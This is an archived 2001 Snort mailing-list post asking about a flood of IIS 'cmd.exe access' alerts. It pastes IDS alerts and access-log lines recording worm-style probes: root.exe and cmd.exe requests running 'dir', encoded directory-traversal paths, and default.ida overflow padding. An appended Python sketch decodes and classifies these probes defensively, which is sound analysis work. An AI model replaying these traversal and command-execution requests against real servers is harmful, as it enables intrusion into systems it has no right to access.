Snort mailing list archives

WEB-IIS Cmd attack


From: Togan Muftuoglu <toganm () users sourceforge net>
Date: Tue, 18 Sep 2001 17:34:12 +0300

Hi,

Suddenly there is a flood of WEB-IIS cmd attacks; this is just a tiny bit
of it.

Is this a new variant or script kiddies around?

TIA

Sep 18 16:50:14 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2031 -> 212.174.50.248:80
Sep 18 16:50:14 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2031 -> 212.174.50.248:80
Sep 18 16:50:15 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2109 -> 212.174.50.248:80
Sep 18 16:50:15 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2109 -> 212.174.50.248:80
Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2177 -> 212.174.50.248:80
Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2177 -> 212.174.50.248:80
Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2243 -> 212.174.50.248:80
Sep 18 16:50:16 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2243 -> 212.174.50.248:80
Sep 18 16:50:17 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2294 -> 212.174.50.248:80
Sep 18 16:50:17 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2294 -> 212.174.50.248:80
Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2522 -> 212.174.50.248:80
Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2522 -> 212.174.50.248:80
Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2613 -> 212.174.50.248:80
Sep 18 16:50:18 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2613 -> 212.174.50.248:80
Sep 18 16:50:19 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2673 -> 212.174.50.248:80
Sep 18 16:50:19 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2673 -> 212.174.50.248:80
Sep 18 16:50:20 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2726 -> 212.174.50.248:80
Sep 18 16:50:20 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2726 -> 212.174.50.248:80
Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2766 -> 212.174.50.248:80
Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:2766 -> 212.174.50.248:80
Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:3155 -> 212.174.50.248:80
Sep 18 16:50:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:3155 -> 212.174.50.248:80
Sep 18 16:50:25 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:3216 -> 212.174.50.248:80
Sep 18 16:50:25 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:3216 -> 212.174.50.248:80
Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:3271 -> 212.174.50.248:80
Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:3271 -> 212.174.50.248:80
Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:3317 -> 212.174.50.248:80
Sep 18 16:50:26 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.209.96.133:3317 -> 212.174.50.248:80
Sep 18 16:56:00 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:3992 -> 212.174.50.248:80
Sep 18 16:56:00 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:3992 -> 212.174.50.248:80
Sep 18 16:56:01 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4172 -> 212.174.50.248:80
Sep 18 16:56:01 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4172 -> 212.174.50.248:80
Sep 18 16:56:03 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4291 -> 212.174.50.248:80
Sep 18 16:56:03 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4291 -> 212.174.50.248:80
Sep 18 16:56:05 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4382 -> 212.174.50.248:80
Sep 18 16:56:05 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4382 -> 212.174.50.248:80
Sep 18 16:56:06 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4575 -> 212.174.50.248:80
Sep 18 16:56:06 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4575 -> 212.174.50.248:80
Sep 18 16:56:08 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4674 -> 212.174.50.248:80
Sep 18 16:56:08 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4674 -> 212.174.50.248:80
Sep 18 16:56:10 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4770 -> 212.174.50.248:80
Sep 18 16:56:10 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4770 -> 212.174.50.248:80
Sep 18 16:56:11 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4875 -> 212.174.50.248:80
Sep 18 16:56:11 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:4875 -> 212.174.50.248:80
Sep 18 16:56:15 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:1137 -> 212.174.50.248:80
Sep 18 16:56:15 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:1137 -> 212.174.50.248:80
Sep 18 16:56:17 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:1483 -> 212.174.50.248:80
Sep 18 16:56:17 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:1483 -> 212.174.50.248:80
Sep 18 16:56:19 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:1616 -> 212.174.50.248:80
Sep 18 16:56:19 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:1616 -> 212.174.50.248:80
Sep 18 16:56:21 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:1789 -> 212.174.50.248:80
Sep 18 16:56:21 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:1789 -> 212.174.50.248:80
Sep 18 16:56:23 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:2014 -> 212.174.50.248:80
Sep 18 16:56:23 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:2014 -> 212.174.50.248:80
Sep 18 16:56:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:2099 -> 212.174.50.248:80
Sep 18 16:56:24 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.221.24.66:2099 -> 212.174.50.248:80
Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:2606 -> 212.174.50.248:80
Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:2606 -> 212.174.50.248:80
Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:2649 -> 212.174.50.248:80
Sep 18 16:57:29 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:2649 -> 212.174.50.248:80
Sep 18 16:57:30 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:2672 -> 212.174.50.248:80
Sep 18 16:57:30 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:2672 -> 212.174.50.248:80
Sep 18 16:57:31 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:2702 -> 212.174.50.248:80
Sep 18 16:57:31 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:2702 -> 212.174.50.248:80
Sep 18 16:57:34 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:2729 -> 212.174.50.248:80
Sep 18 16:57:34 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:2729 -> 212.174.50.248:80
Sep 18 16:57:41 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3041 -> 212.174.50.248:80
Sep 18 16:57:41 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3041 -> 212.174.50.248:80
Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3202 -> 212.174.50.248:80
Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3202 -> 212.174.50.248:80
Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3379 -> 212.174.50.248:80
Sep 18 16:57:45 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3379 -> 212.174.50.248:80
Sep 18 16:57:46 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3402 -> 212.174.50.248:80
Sep 18 16:57:46 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3402 -> 212.174.50.248:80
Sep 18 16:57:49 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3417 -> 212.174.50.248:80
Sep 18 16:57:49 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3417 -> 212.174.50.248:80
Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3594 -> 212.174.50.248:80
Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3594 -> 212.174.50.248:80
Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3617 -> 212.174.50.248:80
Sep 18 16:57:50 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3617 -> 212.174.50.248:80
Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3638 -> 212.174.50.248:80
Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3638 -> 212.174.50.248:80
Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3661 -> 212.174.50.248:80
Sep 18 16:57:51 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.230.34:3661 -> 212.174.50.248:80
Sep 18 16:59:16 gardiyan snort: WEB-IIS cmd.exe access [Classification: Attempted User Privilege Gain   Priority: 8]: 
212.174.113.99:4917 -> 212.174.50.248:80


::ffff:212.209.96.133%134580160 - - [18/Sep/2001:16:50:12 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:13 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:14 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - 
"" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:15 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - 
"" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:16 +0300] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:17 +0300] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:18 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:19 +0300] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:20 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:24 +0300] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:25 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.209.96.133%134595336 - - [18/Sep/2001:16:50:26 +0300] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.174.147.6%134595336 - - [18/Sep/2001:16:50:59 +0300] "GET 
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66 - - [18/Sep/2001:16:55:56 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:55:58 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:00 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - 
"" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:01 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - 
"" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:03 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:05 +0300] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:06 +0300] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:08 +0300] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:10 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:11 +0300] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:15 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:17 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:19 +0300] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:21 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:23 +0300] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.221.24.66%134595336 - - [18/Sep/2001:16:56:24 +0300] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34 - - [18/Sep/2001:16:57:24 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:25 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:29 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - 
"" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:29 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - 
"" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:30 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:31 +0300] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:34 +0300] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:41 +0300] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:45 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:45 +0300] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:46 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:49 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:50 +0300] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:50 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:51 +0300] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "" ""
::ffff:212.174.230.34%134595336 - - [18/Sep/2001:16:57:51 +0300] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 - "" ""
::ffff:212.174.113.99 - - [18/Sep/2001:16:59:16 +0300] "GET 
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
 HTTP/1.0" 404 - "" ""

----- End forwarded message -----

-- 
Togan Muftuoglu
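
One way to triage an access log like the one in the message above, as an added example that is not part of the original post: decode each request path until it stops changing, then group sources that sent the same ordered run of suspicious requests. The log lines are constructed in the post's format with documentation addresses; the function names and the lenient handling of 0xC0/0xC1 lead bytes are assumptions of this sketch.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Request paths as they appear in the post's access log.
PROBES = [
    "/scripts/root.exe?/c+dir",
    "/c/winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%255c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir",
]

def make_line(src, path, status=404):
    # Constructed log line in the post's format; addresses are documentation ranges.
    return (f'::ffff:{src}%1 - - [18/Sep/2001:16:50:12 +0300] '
            f'"GET {path} HTTP/1.0" {status} - "" ""')

SAMPLE = ([make_line("192.0.2.10", p) for p in PROBES]
          + [make_line("198.51.100.7", p) for p in PROBES]
          + [make_line("203.0.113.5", "/index.html", 200)])

LINE = re.compile(r'^(?:::ffff:)?(?P<src>[0-9A-Fa-f.:]+)(?:%\d+)?\s+\S+\s+\S+\s+'
                  r'\[[^\]]+\]\s+"\S+\s+(?P<path>\S+)[^"]*"\s+(?P<status>\d{3})')
OVERLONG = re.compile(rb"[\xc0\xc1](.)", re.S)

def fold(m):
    # Lenient decode of a 0xC0/0xC1 lead byte always lands in the ASCII range.
    return bytes([((m[0][0] & 0x01) << 6) | (m[1][0] & 0x3F)])

def normalize(path, max_rounds=5):
    """Percent-decode the path (query dropped) until stable, folding overlong bytes."""
    cur = path.split("?", 1)[0].encode("utf-8")
    for _ in range(max_rounds):
        nxt = OVERLONG.sub(fold, unquote_to_bytes(cur))
        if nxt == cur:
            break
        cur = nxt
    return cur.decode("latin-1").replace("\\", "/").lower()

def classify(path):
    norm = normalize(path)
    if norm.endswith("/cmd.exe"):
        return "traversal-to-cmd.exe" if "/../" in norm else "direct-cmd.exe"
    if norm.endswith("/root.exe"):
        return "root.exe-probe"
    return "other"

def shared_sequences(lines):
    """Map each group of sources with an identical probe sequence to its length."""
    per_src = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if m and classify(m["path"]) != "other":
            per_src[m["src"]].append(normalize(m["path"]))
    groups = defaultdict(list)
    for src, seq in per_src.items():
        groups[tuple(seq)].append(src)
    return {tuple(sorted(s)): len(seq) for seq, s in groups.items() if len(s) > 1}

if __name__ == "__main__":
    for p in PROBES:
        print(f"{classify(p):22} {normalize(p)}")
    print(shared_sequences(SAMPLE))
```

Several unrelated sources walking the same ordered list of requests within seconds points to an automated tool rather than manual probing.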

